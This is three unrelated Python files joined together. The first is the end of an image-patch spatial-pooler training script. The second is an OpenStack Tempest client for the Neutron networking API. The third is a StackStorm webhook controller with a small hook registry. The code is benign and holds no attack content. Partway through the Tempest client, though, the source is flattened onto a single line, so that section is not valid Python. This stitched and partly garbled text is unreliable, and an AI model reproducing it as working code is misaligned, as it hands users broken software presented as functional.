        # vice-versa in the last learning cycle.
        converged = test_for_convergence(synapses_modified)
        pprint("Iteration %s. Number of synapses modified: %s" %
               (i, synapses_modified.sum()))
        # Periodically checkpoint the learned columns to disk (and always on
        # convergence).
        if i % cycles_to_save == 0 or converged:
            if output_file is not None:
                with open(output_file, 'wb') as fp:
                    pickle.dump(columns, fp)
        # Increment iterations counter.
        i += 1

    return columns


if __name__ == '__main__':
    import sys

    from utils import load_images, extract_patches

    # Check whether the --output_file command line parameter was provided.
    # NOTE(review): the '.' default is dead — sys.exit fires when the flag
    # is absent.
    output_file = '.'
    if '--output_file' in sys.argv:
        # Get the command line parameter value.
        arg_index = sys.argv.index('--output_file')
        output_file = sys.argv[arg_index + 1]
    else:
        sys.exit('The parameter --output_file is mandatory.')

    # Check whether the --images_path command line parameter was provided.
    images_path = '.'
    if '--images_path' in sys.argv:
        # Get the command line parameter value.
        arg_index = sys.argv.index('--images_path')
        images_path = sys.argv[arg_index + 1]

    # Check whether the --create_patches command line parameter was provided.
    create_patches = False
    if '--create_patches' in sys.argv:
        create_patches = True

    # Check whether the --patches_file command line parameter was provided.
    patches_file = None
    if '--patches_file' in sys.argv:
        # Get the command line parameter value.
        arg_index = sys.argv.index('--patches_file')
        patches_file = sys.argv[arg_index + 1]

    patches = None
    if patches_file is not None:
        # If the patches_file command line parameter was provided,
        # read it from disk.
        pprint("Reading patches file ...")
        with open(patches_file, 'rb') as fp:
            patches = pickle.load(fp)
    else:
        # If the patches_file command line parameter was not provided,
        # load the images from disk, ...
        pprint("Loading images ...")
        images, image_files = load_images(images_path, extensions=['.png'],
                                          img_shape=(256, 256))
        if create_patches:
            # and if the --create_patches was provided generate the patches.
            pprint("Extracting patches ...")
            patches = extract_patches(images, patch_shape=(16, 16))
            # NOTE(review): this inner check is dead code — this branch is
            # only reached when patches_file is None.
            if patches_file is not None:
                pprint("Saving patches to disk ...")
                with open(patches_file, 'wb') as fp:
                    pickle.dump(patches, fp)
        else:
            # or, if the --create_patches was not provided, use the images
            # themselves as the patches.
            patches = images

    # Finally, start the learning procedure.
    pprint("Starting training ...")
    columns = spatial_pooler(patches, shape=(16, 16, 16, 16), p_connect=0.1,
                             connect_threshold=0.2, p_inc=0.0005,
                             p_dec=0.0025, b_inc=0.005, p_mult=0.01,
                             min_activity_threshold=0.01,
                             desired_activity_mult=0.05, b_max=4,
                             max_iterations=patches.shape[0],
                             output_file=output_file)
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import json

from tempest.common.rest_client import RestClient


class NetworkClientJSON(RestClient):

    """
    Tempest REST client for Neutron. Uses v2 of the Neutron API, since the
    V1 API has been removed from the code base.

    Implements create, delete, update, list and show for the basic Neutron
    abstractions (networks, sub-networks, routers, ports and floating IP):

    Implements add/remove interface to router using subnet ID / port ID

    It also implements list, show, update and reset for OpenStack Networking
    quotas

    All methods return a (response, decoded-JSON-body) tuple.
    NOTE(review): dict.iteritems() is used in several methods below, which
    makes this class Python 2 only.
    """

    def __init__(self, config, username, password, auth_url, tenant_name=None):
        super(NetworkClientJSON, self).__init__(config, username, password,
                                                auth_url, tenant_name)
        # The service endpoint is resolved from the catalog by RestClient.
        self.service = self.config.network.catalog_type
        self.version = '2.0'
        # All URIs below are rooted at "v2.0".
        self.uri_prefix = "v%s" % (self.version)

    def list_networks(self):
        uri = '%s/networks' % (self.uri_prefix)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def create_network(self, name, **kwargs):
        # Extra network attributes are passed through as-is via kwargs.
        post_body = {'network': kwargs}
        post_body['network']['name'] = name
        body = json.dumps(post_body)
        uri = '%s/networks' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def create_bulk_network(self, count, names):
        # Create *count* networks in a single bulk request, named from
        # names[0..count-1].
        network_list = list()
        for i in range(count):
            network_list.append({'name': names[i]})
        post_body = {'networks': network_list}
        body = json.dumps(post_body)
        uri = '%s/networks' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def show_network(self, uuid):
        uri = '%s/networks/%s' % (self.uri_prefix, uuid)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def delete_network(self, uuid):
        uri = '%s/networks/%s' % (self.uri_prefix, uuid)
        resp, body = self.delete(uri, self.headers)
        return resp, body

    def create_subnet(self, net_uuid, cidr, ip_version=4, **kwargs):
        post_body = {'subnet': kwargs}
        post_body['subnet']['ip_version'] = ip_version
        post_body['subnet']['network_id'] = net_uuid
        post_body['subnet']['cidr'] = cidr
        body = json.dumps(post_body)
        uri = '%s/subnets' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def delete_subnet(self, uuid):
        uri = '%s/subnets/%s' % (self.uri_prefix, uuid)
        resp, body = self.delete(uri, self.headers)
        return resp, body

    def list_subnets(self):
        uri = '%s/subnets' % (self.uri_prefix)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def show_subnet(self, uuid):
        uri = '%s/subnets/%s' % (self.uri_prefix, uuid)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def create_port(self, network_id, **kwargs):
        post_body = {
            'port': {
                'network_id': network_id,
            }
        }
        for key, val in kwargs.items():
            post_body['port'][key] = val
        body = json.dumps(post_body)
        uri = '%s/ports' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def delete_port(self, port_id):
        uri = '%s/ports/%s' % (self.uri_prefix, port_id)
        resp, body = self.delete(uri, self.headers)
        return resp, body

    def list_ports(self, **filters):
        uri = '%s/ports' % (self.uri_prefix)
        # Filters become query-string parameters.
        # NOTE(review): iteritems() is Python 2 only (items() works on both);
        # values are not URL-encoded — confirm callers only pass safe values.
        filter_items = ["%s=%s" % (k, v) for (k, v) in filters.iteritems()]
        querystring = "&".join(filter_items)
        if querystring:
            uri = "%s?%s" % (uri, querystring)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def show_port(self, port_id):
        uri = '%s/ports/%s' % (self.uri_prefix, port_id)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def update_quotas(self, tenant_id, **kwargs):
        put_body = {'quota': kwargs}
        body = json.dumps(put_body)
        uri = '%s/quotas/%s' % (self.uri_prefix, tenant_id)
        resp, body = self.put(uri, body, self.headers)
        body = json.loads(body)
        # Quota calls unwrap the top-level key before returning.
        return resp, body['quota']

    def show_quotas(self, tenant_id):
        uri = '%s/quotas/%s' % (self.uri_prefix, tenant_id)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body['quota']

    def reset_quotas(self, tenant_id):
        uri = '%s/quotas/%s' % (self.uri_prefix, tenant_id)
        resp, body = self.delete(uri, self.headers)
        return resp, body

    def list_quotas(self):
        uri = '%s/quotas' % (self.uri_prefix)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body['quotas']

    def update_subnet(self, subnet_id, new_name):
        put_body = {
            'subnet': {
                'name': new_name,
            }
        }
        body = json.dumps(put_body)
        uri = '%s/subnets/%s' % (self.uri_prefix, subnet_id)
        resp, body = self.put(uri, body=body, headers=self.headers)
        body = json.loads(body)
        return resp, body

    def update_port(self, port_id, new_name):
        put_body = {
            'port': {
                'name': new_name,
            }
        }
        body = json.dumps(put_body)
        uri = '%s/ports/%s' % (self.uri_prefix, port_id)
        resp, body = self.put(uri, body=body, headers=self.headers)
        body = json.loads(body)
        return resp, body

    def update_network(self, network_id, new_name):
        put_body = {
            "network": {
                "name": new_name,
            }
        }
        body = json.dumps(put_body)
        uri = '%s/networks/%s' % (self.uri_prefix, network_id)
        resp, body = self.put(uri, body=body, headers=self.headers)
        body = json.loads(body)
        return resp, body

    def list_routers(self):
        uri = '%s/routers' % (self.uri_prefix)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def create_router(self, name,
                      admin_state_up=True, **kwargs):
        post_body = {'router': kwargs}
        post_body['router']['name'] = name
        post_body['router']['admin_state_up'] = admin_state_up
        body = json.dumps(post_body)
        uri = '%s/routers' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def delete_router(self, router_id):
        uri = '%s/routers/%s' % (self.uri_prefix, router_id)
        resp, body = self.delete(uri, self.headers)
        return resp, body

    def show_router(self, router_id):
        uri = '%s/routers/%s' % (self.uri_prefix, router_id)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def _update_router(self, router_id, set_enable_snat, **kwargs):
        # Read-modify-write: fetch the current router, overlay kwargs, and
        # PUT the result back. When set_enable_snat is False, strip
        # enable_snat from the current gateway info so it is never sent.
        uri = '%s/routers/%s' % (self.uri_prefix, router_id)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        update_body = {}
        update_body['name'] = kwargs.get('name', body['router']['name'])
        update_body['admin_state_up'] = kwargs.get(
            'admin_state_up', body['router']['admin_state_up'])
        cur_gw_info = body['router']['external_gateway_info']
        if cur_gw_info and not set_enable_snat:
            cur_gw_info.pop('enable_snat', None)
        update_body['external_gateway_info'] = kwargs.get(
            'external_gateway_info', body['router']['external_gateway_info'])
        update_body = dict(router=update_body)
        update_body = json.dumps(update_body)
        resp, body = self.put(uri, update_body, self.headers)
        body = json.loads(body)
        return resp, body

    def update_router(self, router_id, **kwargs):
        """Update a router leaving enable_snat to its default value."""
        # If external_gateway_info contains enable_snat the request will fail
        # with 404 unless executed with admin client, and therefore we instruct
        # _update_router to not set this attribute
        # NOTE(salv-orlando): The above applies as long as Neutron's default
        # policy is to restrict enable_snat usage to admins only.
        return self._update_router(router_id, set_enable_snat=False, **kwargs)

    def update_router_with_snat_gw_info(self, router_id, **kwargs):
        """Update a router passing also the enable_snat attribute.

        This method must be executed with admin credentials, otherwise the
        API call will return a 404 error.
        """
        return self._update_router(router_id, set_enable_snat=True, **kwargs)

    def add_router_interface_with_subnet_id(self, router_id, subnet_id):
        uri = '%s/routers/%s/add_router_interface' % (self.uri_prefix,
                                                      router_id)
        update_body = {"subnet_id": subnet_id}
        update_body = json.dumps(update_body)
        resp, body = self.put(uri, update_body, self.headers)
        body = json.loads(body)
        return resp, body

    def add_router_interface_with_port_id(self, router_id, port_id):
        uri = '%s/routers/%s/add_router_interface' % (self.uri_prefix,
                                                      router_id)
        update_body = {"port_id": port_id}
        update_body = json.dumps(update_body)
        resp, body = self.put(uri, update_body, self.headers)
        body = json.loads(body)
        return resp, body

    def remove_router_interface_with_subnet_id(self, router_id, subnet_id):
        uri = '%s/routers/%s/remove_router_interface' % (self.uri_prefix,
                                                         router_id)
        update_body = {"subnet_id": subnet_id}
        update_body = json.dumps(update_body)
        resp, body = self.put(uri, update_body, self.headers)
        body = json.loads(body)
        return resp, body

    def remove_router_interface_with_port_id(self, router_id, port_id):
        uri = '%s/routers/%s/remove_router_interface' % (self.uri_prefix,
                                                         router_id)
        update_body = {"port_id": port_id}
        update_body = json.dumps(update_body)
        resp, body = self.put(uri, update_body, self.headers)
        body = json.loads(body)
        return resp, body

    def create_floating_ip(self, ext_network_id, **kwargs):
        post_body = {
            'floatingip': kwargs}
        post_body['floatingip']['floating_network_id'] = ext_network_id
        body = json.dumps(post_body)
        uri = '%s/floatingips' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def list_security_groups(self):
        uri = '%s/security-groups' % (self.uri_prefix)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def delete_security_group(self, secgroup_id):
        uri = '%s/security-groups/%s' % (self.uri_prefix, secgroup_id)
        resp, body = self.delete(uri, self.headers)
        return resp, body

    def create_security_group(self, name, **kwargs):
        post_body = {
            'security_group': {
                'name': name,
            }
        }
        # NOTE(review): iteritems() is Python 2 only; items() works on both.
        for key, value in kwargs.iteritems():
            post_body['security_group'][str(key)] = value
        body = json.dumps(post_body)
        uri = '%s/security-groups' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def show_floating_ip(self, floating_ip_id):
        uri = '%s/floatingips/%s' % (self.uri_prefix, floating_ip_id)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def show_security_group(self, secgroup_id):
        uri = '%s/security-groups/%s' % (self.uri_prefix, secgroup_id)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def list_floating_ips(self):
        uri = '%s/floatingips' % (self.uri_prefix)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def list_security_group_rules(self):
        uri = '%s/security-group-rules' % (self.uri_prefix)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def delete_floating_ip(self, floating_ip_id):
        uri = '%s/floatingips/%s' % (self.uri_prefix, floating_ip_id)
        resp, body = self.delete(uri, self.headers)
        return resp, body

    def update_floating_ip(self, floating_ip_id, **kwargs):
        post_body = {
            'floatingip': kwargs}
        body = json.dumps(post_body)
        uri = '%s/floatingips/%s' % (self.uri_prefix, floating_ip_id)
        resp, body = self.put(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def create_security_group_rule(self, secgroup_id,
                                   direction='ingress', **kwargs):
        post_body = {
            'security_group_rule': {
                'direction': direction,
                'security_group_id': secgroup_id
            }
        }
        # NOTE(review): iteritems() is Python 2 only; items() works on both.
        for key, value in kwargs.iteritems():
            post_body['security_group_rule'][str(key)] = value
        body = json.dumps(post_body)
        uri = '%s/security-group-rules' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def create_bulk_subnet(self, subnet_list):
        # Bulk-create: subnet_list is a list of subnet attribute dicts.
        post_body = {'subnets': subnet_list}
        body = json.dumps(post_body)
        uri = '%s/subnets' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def delete_security_group_rule(self, rule_id):
        uri = '%s/security-group-rules/%s' % (self.uri_prefix, rule_id)
        resp, body = self.delete(uri, self.headers)
        return resp, body

    def show_security_group_rule(self, rule_id):
        uri = '%s/security-group-rules/%s' % (self.uri_prefix, rule_id)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def create_bulk_port(self, port_list):
        post_body = {'ports': port_list}
        body = json.dumps(post_body)
        uri = '%s/ports' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def list_vips(self):
        uri = '%s/lb/vips' % (self.uri_prefix)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def create_vip(self, name, protocol, protocol_port, subnet_id, pool_id):
        post_body = {
            "vip": {
                "protocol": protocol,
                "name": name,
                "subnet_id": subnet_id,
                "pool_id": pool_id,
                "protocol_port": protocol_port
            }
        }
        body = json.dumps(post_body)
        uri = '%s/lb/vips' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def create_pool(self, name, lb_method, protocol, subnet_id):
        post_body = {
            "pool": {
                "protocol": protocol,
                "name": name,
                "subnet_id": subnet_id,
                "lb_method": lb_method
            }
        }
        body = json.dumps(post_body)
        uri = '%s/lb/pools' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def show_vip(self, uuid):
        uri = '%s/lb/vips/%s' % (self.uri_prefix, uuid)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def delete_vip(self, uuid):
        uri = '%s/lb/vips/%s' % (self.uri_prefix, uuid)
        resp, body = self.delete(uri, self.headers)
        return resp, body

    def delete_pool(self, uuid):
        uri = '%s/lb/pools/%s' % (self.uri_prefix, uuid)
        resp, body = self.delete(uri, self.headers)
        return resp, body

    def update_vip(self, vip_id, new_name):
        put_body = {
            "vip": {
                "name": new_name,
            }
        }
        body = json.dumps(put_body)
        uri = '%s/lb/vips/%s' % (self.uri_prefix, vip_id)
        resp, body = self.put(uri, body=body, headers=self.headers)
        body = json.loads(body)
        return resp, body

    def update_pool(self, pool_id, new_name):
        put_body = {
            "pool": {
                "name": new_name,
            }
        }
        body = json.dumps(put_body)
        uri = '%s/lb/pools/%s' % (self.uri_prefix, pool_id)
        resp, body = self.put(uri, body=body, headers=self.headers)
        body = json.loads(body)
        return resp, body

    def list_pools(self):
        uri = '%s/lb/pools' % (self.uri_prefix)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def show_pool(self, uuid):
        uri = '%s/lb/pools/%s' % (self.uri_prefix, uuid)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def list_members(self):
        uri = '%s/lb/members' % (self.uri_prefix)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def create_member(self, address, protocol_port, pool_id):
        post_body = {
            "member": {
                "protocol_port": protocol_port,
                "pool_id": pool_id,
                "address": address
            }
        }
        body = json.dumps(post_body)
        uri = '%s/lb/members' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def show_member(self, uuid):
        uri = '%s/lb/members/%s' % (self.uri_prefix, uuid)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def delete_member(self, uuid):
        uri = '%s/lb/members/%s' % (self.uri_prefix, uuid)
        resp, body = self.delete(uri, self.headers)
        return resp, body

    def update_member(self, admin_state_up, member_id):
        # NOTE(review): unusual argument order (value before id), unlike the
        # other update_* methods — kept as-is for caller compatibility.
        put_body = {
            "member": {
                "admin_state_up": admin_state_up
            }
        }
        body = json.dumps(put_body)
        uri = '%s/lb/members/%s' % (self.uri_prefix, member_id)
        resp, body = self.put(uri, body=body, headers=self.headers)
        body = json.loads(body)
        return resp, body

    def list_health_monitors(self):
        uri = '%s/lb/health_monitors' % (self.uri_prefix)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def create_health_monitor(self, delay, max_retries, Type, timeout):
        # 'Type' is capitalized to avoid shadowing the builtin type().
        post_body = {
            "health_monitor": {
                "delay": delay,
                "max_retries": max_retries,
                "type": Type,
                "timeout": timeout
            }
        }
        body = json.dumps(post_body)
        uri = '%s/lb/health_monitors' % (self.uri_prefix)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def show_health_monitor(self, uuid):
        uri = '%s/lb/health_monitors/%s' % (self.uri_prefix, uuid)
        resp, body = self.get(uri, self.headers)
        body = json.loads(body)
        return resp, body

    def delete_health_monitor(self, uuid):
        uri = '%s/lb/health_monitors/%s' % (self.uri_prefix, uuid)
        resp, body = self.delete(uri, self.headers)
        return resp, body

    def update_health_monitor(self, admin_state_up, uuid):
        put_body = {
            "health_monitor": {
                "admin_state_up": admin_state_up
            }
        }
        body = json.dumps(put_body)
        uri = '%s/lb/health_monitors/%s' % (self.uri_prefix, uuid)
        resp, body = self.put(uri, body=body, headers=self.headers)
        body = json.loads(body)
        return resp, body

    def associate_health_monitor_with_pool(self, health_monitor_id,
                                           pool_id):
        post_body = {
            "health_monitor": {
                "id": health_monitor_id,
            }
        }
        body = json.dumps(post_body)
        uri = '%s/lb/pools/%s/health_monitors' % (self.uri_prefix, pool_id)
        resp, body = self.post(uri, headers=self.headers, body=body)
        body = json.loads(body)
        return resp, body

    def disassociate_health_monitor_with_pool(self, health_monitor_id,
                                              pool_id):
        uri = 
'%s/lb/pools/%s/health_monitors/%s' % (self.uri_prefix, pool_id, health_monitor_id) resp, body = self.delete(uri, headers=self.headers) return resp, body def list_extensions(self): uri = '%s/extensions' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def show_extension_details(self, ext_alias): uri = '%s/extensions/%s' % (self.uri_prefix, ext_alias) resp, body = self.get(uri, headers=self.headers) body = json.loads(body) return resp, body def list_vpn_services(self): uri = '%s/vpn/vpnservices' % (self.uri_prefix) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def create_vpn_service(self, subnet_id, router_id, **kwargs): post_body = { "vpnservice": { "subnet_id": subnet_id, "router_id": router_id } } for key, val in kwargs.items(): post_body['vpnservice'][key] = val body = json.dumps(post_body) uri = '%s/vpn/vpnservices' % (self.uri_prefix) resp, body = self.post(uri, headers=self.headers, body=body) body = json.loads(body) return resp, body def show_vpn_service(self, uuid): uri = '%s/vpn/vpnservices/%s' % (self.uri_prefix, uuid) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def delete_vpn_service(self, uuid): uri = '%s/vpn/vpnservices/%s' % (self.uri_prefix, uuid) resp, body = self.delete(uri, self.headers) return resp, body def update_vpn_service(self, uuid, description): put_body = { "vpnservice": { "description": description } } body = json.dumps(put_body) uri = '%s/vpn/vpnservices/%s' % (self.uri_prefix, uuid) resp, body = self.put(uri, body=body, headers=self.headers) body = json.loads(body) return resp, body def list_router_interfaces(self, uuid): uri = '%s/ports?device_id=%s' % (self.uri_prefix, uuid) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def list_agents(self): uri = '%s/agents' % self.uri_prefix resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def 
list_routers_on_l3_agent(self, agent_id): uri = '%s/agents/%s/l3-routers' % (self.uri_prefix, agent_id) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def list_l3_agents_hosting_router(self, router_id): uri = '%s/routers/%s/l3-agents' % (self.uri_prefix, router_id) resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body def list_service_providers(self): uri = '%s/service-providers' % self.uri_prefix resp, body = self.get(uri, self.headers) body = json.loads(body) return resp, body
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Prefer the C-accelerated simplejson when available, fall back to stdlib.
try:
    import simplejson as json
except ImportError:
    import json

import six
import pecan
import uuid
from pecan import abort
from pecan.rest import RestController
from six.moves.urllib import parse as urlparse  # pylint: disable=import-error
urljoin = urlparse.urljoin

from st2common import log as logging
from st2common.constants.triggers import WEBHOOK_TRIGGER_TYPES
from st2common.models.api.base import jsexpose
from st2common.models.api.trace import TraceContext
from st2common.models.api.trigger import TriggerAPI
import st2common.services.triggers as trigger_service
from st2common.services.triggerwatcher import TriggerWatcher
from st2common.transport.reactor import TriggerDispatcher
from st2common.util.http import parse_content_type_header
from st2common.rbac.types import PermissionType
from st2common.rbac.decorators import request_user_has_webhook_permission

http_client = six.moves.http_client

LOG = logging.getLogger(__name__)

# HTTP header which, when present on an incoming webhook request, supplies
# the trace tag to associate with the dispatched trigger instances.
TRACE_TAG_HEADER = 'St2-Trace-Tag'


class HooksHolder(object):
    """
    Maintains a hook to Trigger mapping.
    """

    def __init__(self):
        # Maps hook url (str) -> list of trigger dicts registered under it.
        self._triggers_by_hook = {}

    def __contains__(self, key):
        # Membership test: "hook in holder".
        return key in self._triggers_by_hook

    def add_hook(self, hook, trigger):
        # Register trigger under hook, creating the bucket on first use.
        if hook not in self._triggers_by_hook:
            self._triggers_by_hook[hook] = []
        self._triggers_by_hook[hook].append(trigger)

    def remove_hook(self, hook, trigger):
        # Remove trigger (matched by its 'id' key) from hook's bucket.
        # Returns True when something was removed, False otherwise.
        if hook not in self._triggers_by_hook:
            return False
        remove_index = -1
        for idx, item in enumerate(self._triggers_by_hook[hook]):
            if item['id'] == trigger['id']:
                remove_index = idx
                break
        if remove_index < 0:
            return False
        self._triggers_by_hook[hook].pop(remove_index)
        # Drop the bucket once its last trigger is gone so that
        # __contains__ only reports live hooks.
        if not self._triggers_by_hook[hook]:
            del self._triggers_by_hook[hook]
        return True

    def get_triggers_for_hook(self, hook):
        # All triggers registered for hook; empty list when unknown.
        return self._triggers_by_hook.get(hook, [])

    def get_all(self):
        # Flat list of every registered trigger across all hooks.
        triggers = []
        for values in six.itervalues(self._triggers_by_hook):
            triggers.extend(values)
        return triggers


class WebhooksController(RestController):
    def __init__(self, *args, **kwargs):
        super(WebhooksController, self).__init__(*args, **kwargs)
        self._hooks = HooksHolder()
        self._base_url = '/webhooks/'
        self._trigger_types = WEBHOOK_TRIGGER_TYPES.keys()

        self._trigger_dispatcher = TriggerDispatcher(LOG)
        queue_suffix = self.__class__.__name__
        # Background watcher keeps self._hooks in sync with trigger
        # create/update/delete events for the webhook trigger types.
        self._trigger_watcher = TriggerWatcher(create_handler=self._handle_create_trigger,
                                               update_handler=self._handle_update_trigger,
                                               delete_handler=self._handle_delete_trigger,
                                               trigger_types=self._trigger_types,
                                               queue_suffix=queue_suffix,
                                               exclusive=True)
        self._trigger_watcher.start()
        self._register_webhook_trigger_types()

    @jsexpose()
    def get_all(self):
        # Return only the hooks known by this controller.
        return self._hooks.get_all()

    @jsexpose()
    def get_one(self, name):
        triggers = self._hooks.get_triggers_for_hook(name)

        if not triggers:
            abort(http_client.NOT_FOUND)
            return

        # For demonstration purpose return 1st
        return triggers[0]

    @request_user_has_webhook_permission(permission_type=PermissionType.WEBHOOK_SEND)
    @jsexpose(arg_types=[str], status_code=http_client.ACCEPTED)
    def post(self, *args, **kwargs):
        # Rebuild the hook path from the URL segments.
        # TODO: There must be a better way to do this.
        hook = '/'.join(args)

        # Note: For backward compatibility reasons we default to application/json if content
        # type is not explicitly provided
        content_type = pecan.request.headers.get('Content-Type', 'application/json')
        content_type = parse_content_type_header(content_type=content_type)[0]
        body = pecan.request.body

        try:
            body = self._parse_request_body(content_type=content_type, body=body)
        except Exception as e:
            self._log_request('Failed to parse request body: %s.' % (str(e)), pecan.request)
            msg = 'Failed to parse request body "%s": %s' % (body, str(e))
            return pecan.abort(http_client.BAD_REQUEST, msg)

        headers = self._get_headers_as_dict(pecan.request.headers)

        # If webhook contains a trace-tag use that, else create a unique trace-tag.
        trace_context = self._create_trace_context(trace_tag=headers.pop(TRACE_TAG_HEADER, None),
                                                   hook=hook)

        # 'st2' is the built-in generic webhook; it carries its own trigger name.
        if hook == 'st2' or hook == 'st2/':
            return self._handle_st2_webhook(body, trace_context=trace_context)

        if not self._is_valid_hook(hook):
            self._log_request('Invalid hook.', pecan.request)
            msg = 'Webhook %s not registered with st2' % hook
            return pecan.abort(http_client.NOT_FOUND, msg)

        triggers = self._hooks.get_triggers_for_hook(hook)
        payload = {}

        payload['headers'] = headers
        payload['body'] = body
        # Dispatch trigger instance for each of the trigger found
        for trigger in triggers:
            self._trigger_dispatcher.dispatch(trigger, payload=payload,
                                              trace_context=trace_context)

        return body

    def _parse_request_body(self, content_type, body):
        # Decode the raw request body according to its declared content type.
        # Raises ValueError for unsupported content types.
        if content_type == 'application/json':
            self._log_request('Parsing request body as JSON', request=pecan.request)
            body = json.loads(body)
        elif content_type in ['application/x-www-form-urlencoded', 'multipart/form-data']:
            self._log_request('Parsing request body as form encoded data', request=pecan.request)
            body = urlparse.parse_qs(body)
        else:
            raise ValueError('Unsupported Content-Type: "%s"' % (content_type))

        return body

    def _handle_st2_webhook(self, body, trace_context):
        # Generic st2 webhook: the request body names the trigger itself.
        trigger = body.get('trigger', None)
        payload = body.get('payload', None)
        if not trigger:
            msg = 'Trigger not specified.'
            return pecan.abort(http_client.BAD_REQUEST, msg)

        self._trigger_dispatcher.dispatch(trigger, payload=payload, trace_context=trace_context)

        return body

    def _is_valid_hook(self, hook):
        # TODO: Validate hook payload with payload_schema.
        return hook in self._hooks

    def _register_webhook_trigger_types(self):
        # Ensure the webhook trigger types exist in the datastore.
        for trigger_type in WEBHOOK_TRIGGER_TYPES.values():
            trigger_service.create_trigger_type_db(trigger_type)

    def _create_trace_context(self, trace_tag, hook):
        # if no trace_tag then create a unique one
        if not trace_tag:
            trace_tag = 'webhook-%s-%s' % (hook, uuid.uuid4().hex)
        return TraceContext(trace_tag=trace_tag)

    def add_trigger(self, trigger):
        # Note: Permission checking for creating and deleting a webhook is done during rule
        # creation
        url = self._get_normalized_url(trigger)
        LOG.info('Listening to endpoint: %s', urljoin(self._base_url, url))
        self._hooks.add_hook(url, trigger)

    def update_trigger(self, trigger):
        # Webhook triggers carry no mutable state we track, so updates are a no-op.
        pass

    def remove_trigger(self, trigger):
        # Note: Permission checking for creating and deleting a webhook is done during rule
        # creation
        url = self._get_normalized_url(trigger)

        removed = self._hooks.remove_hook(url, trigger)
        if removed:
            LOG.info('Stop listening to endpoint: %s', urljoin(self._base_url, url))

    def _get_normalized_url(self, trigger):
        """
        remove the trailing and leading / so that the hook url and those coming
        from trigger parameters end up being the same.
        """
        return trigger['parameters']['url'].strip('/')

    def _get_headers_as_dict(self, headers):
        # Copy a webob/pecan headers object into a plain dict.
        headers_dict = {}
        for key, value in headers.items():
            headers_dict[key] = value
        return headers_dict

